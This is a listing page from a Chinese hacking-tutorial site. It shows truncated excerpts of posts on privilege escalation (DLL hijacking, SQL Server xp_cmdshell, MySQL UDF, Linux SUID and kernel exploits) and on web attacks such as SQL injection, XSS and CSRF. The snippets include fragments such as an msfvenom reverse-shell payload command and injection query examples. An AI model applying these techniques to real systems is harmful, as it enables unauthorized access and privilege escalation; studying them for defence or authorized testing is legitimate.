中文黑客网 - 黑客技术教程学习基地 - CNHACK - 中文黑客网 中文黑客网 - 黑客技术教程学习基地 - CNHACK - 中文黑客网

作者 中文黑客网 的所有文章

权限提升

msf结合漏洞审计工具进行提权

11

中文黑客网 发布于 11-16

1、windows补丁审计工具使用 在终端下可以使用命令systeminfo来查看系统的一些补丁信息 http://www.demo1.com/asp.aspx补丁检测Windows-Exploit-Suggesterhttps://github.com/GDSSecurity/Windows-Exploit-Suggeste...

阅读(64) 评论(0 )

权限提升

FileZilla 提权

8

中文黑客网 发布于 11-16

1、简介  FileZilla是一个ftp服务器,假如配置不严的,读取xml密码可以执行一些简答的命令默认安装目录C:\ProgramFiles\FileZillaServer\ 2、提权    FileZilla Server Interface.xml&...

阅读(54) 评论(0 )

权限提升

zend反弹shell提权

3

中文黑客网 发布于 11-16

这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole生成反弹shell生成攻击载荷msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345&nbs...

阅读(58) 评论(0 )

权限提升

zend nc 提权

4

中文黑客网 发布于 11-16

1、简介 在php里面有一个扩展是zend这个是用解析phpzend脚本加密文件。如果服务器安装了zend如果ZendExtensionManager.dll权限可以修改,那就可以用其他dl替换这dll文件。查找ZendExtensionManager.dllC:\ZkeysSoft\Zend\ZendOptimizer-3.3.3\l...

阅读(49) 评论(0 )

权限提升

lpk劫持提权

3

中文黑客网 发布于 11-15

1、简介 lpk劫持  在window2003或windowxp中如果同一个目录中存在exe和lpk.dll每当exe执行的时候就会被劫持。利用这个特性可以把lpk提权的文件放到权限较高的程序,当exe运行时,lpk.dl就可以进行提权。 2、T00lsLpkSethcv4 这个工具是生成lpkd...

阅读(53) 评论(0 )

权限提升

Sqlserver提权

4

中文黑客网 发布于 11-15

1、简介如果网站里面使用的数据库是sqlserver那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。 2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx 3、开启xp_cmdshellExec ...

阅读(54) 评论(0 )

权限提升

mysql udf 提权

2

中文黑客网 发布于 11-15

1、简介在mysql可以使用自定义函数进行提权,udf=userdefinedfunction用户自定义函数对于自定义的函数在mysql5.1版本以后就需要放在插件插件目录/lib/plugin,文件后缀微dll,c语言编写 2、插件目录 可以使用语句查询plugin插件目录showvariableslike"%plugin%...

阅读(54) 评论(0 )

权限提升

Windows系统溢出提权

5

中文黑客网 发布于 11-15

1、简介window服务器常用的是win2003win2008win2012在渗透测试中,我们获取的权限是iis_user用户组,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 2、程序权限的对比 在iis里面权限依次的大小对比aspx->php=>...

阅读(61) 评论(0 )

权限提升

LINUX SUID提权

5

中文黑客网 发布于 11-15

1、简介SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现它的...

阅读(50) 评论(0 )

权限提升

LINUX 内核漏洞提权

4

中文黑客网 发布于 11-15

1、简介通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限超级管理员权限。2、创建交互shelllinux提权需要交互shell...

阅读(71) 评论(0 )

Web安全

从官方文档到0day挖掘思路

12

中文黑客网 发布于 11-10

开篇废话我很喜欢ASRC某位大佬说过的一句话:挖洞的本质就是信息收集。一些开源项目的官方文档我们可以挖掘到很多有用信息,比如API利用、默认口令、硬编码等。本文主要以提供思路为目的,现在网上已经公开xxl-job未授权rce漏洞。在GitHub上能看到xxl-job与官网公开的文档。首先我们先通过官方文档进行信息收集,了解这个东西是干嘛的,已经公...

阅读(54) 评论(0 )

黑客技术

XSS 实战攻击思路总结

21

中文黑客网 发布于 11-10

前言前几天看到B站up主公孙田浩投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......实际上这就是一个中规中矩的XSS漏洞案例,在安全圈子里面应该也算是基本操作,正好博客以前没有记录过类似的文章,那么本文就来还原一下这个攻击过程。鉴别网站下面是一个经典的QQ空间钓鱼网站:域名分析钓鱼网站最...

阅读(109) 评论(0 )

渗透测试

SQL注入篇之 mysql+php 延时注入

中文黑客网 发布于 11-8

延时注入属于盲注入的一种,这种注入通过mysql里面的sleep()函数,这个函数的意思是延时执行多少秒。sleep通常与if一起使用例如 selectif('root'='root',sleep(3),0)如果字符串root等于root数据库延时3秒否则输出0延时方法是先获取数据的长度selectif(LENGTH(version()...

阅读(53) 评论(0 )

渗透测试

SQL注入篇之mysql+php 爆库 爆表 爆字段

1

中文黑客网 发布于 11-8

在上面一章mysql+php手工注入篇 在最后用到的一个函数group_concat()可以将查询的字段的数据查询出来可以用利这个函数将mysql所有的库名查询出来  1、查询所有的库http://target_sys.com/article.php?id=-1 union select ...

阅读(48) 评论(0 )

渗透测试

SQL注入篇之mysql+php手工注入篇

中文黑客网 发布于 11-6

1、mysql的注释符号#--空格/*里面的内容都会被注释*/用于注释后后面语句不再执行例如select*fromartilewhereid=1#这个部分的语句不再执行  2、注入常用查询系统信息函数 version()MySQL版本user()数据库用户名database()数据库名@@datadir数据库路径@@...

阅读(46) 评论(0 )

渗透测试

逻辑漏洞密码找回漏洞和利用

8

中文黑客网 发布于 11-6

为了防止用户遗忘密码,大多数网站都提供了找回密码功能。常见的找回密码方式有:邮箱找回密码、根据密码保护问题找回密码、根据手机号码找回密码等。虽然这些方式都可以找回密码,但实现方式各不相同。无论是哪种密码找回方式,在找回密码时,除了自己的用户密码,如果还能找回其他用户的密码,就存在密码找回漏洞。密码找回漏洞在逻辑漏洞中占了较大的比例。测试密码找回漏...

阅读(51) 评论(0 )

渗透测试

伪随机码漏洞与利用

4

中文黑客网 发布于 11-6

伪随机码结构可以预先确定,重复产生和复制,具有某种随机序列的随机特性的序列号。在WEB开发中伪随机码主要用于确定范围例如6位数的范围是000000-999999这个范围内随机生成一个值。在php里就有这样的函数rand()函数是产生随机数的一个随机函数例如生成000000-999999可以这样设置rand(000000,999999)在WEB安全...

阅读(48) 评论(0 )

渗透测试

越权漏洞与利用

4

中文黑客网 发布于 11-6

1、什么是越权漏洞越权漏洞是一种很常见的逻辑安全漏洞。可以这样理解:服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致攻击账号拥有了其他账户的增删改查功能。越权漏洞分类2、平行越权就是相同级别(权限)的用户或者同一角色不同的用户之间,可以越权访问、修改或者删除的非法操作。两个相同权限的账号分别是moonteammoon密...

阅读(51) 评论(0 )

渗透测试

CSRF漏洞和利用

3

中文黑客网 发布于 11-5

CSRF定义:跨站请求伪造(英语:Cross-siterequestforgery),也被称为one-clickattack或者sessionriding,通常缩写为CSRF,是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发...

阅读(48) 评论(0 )

sitemap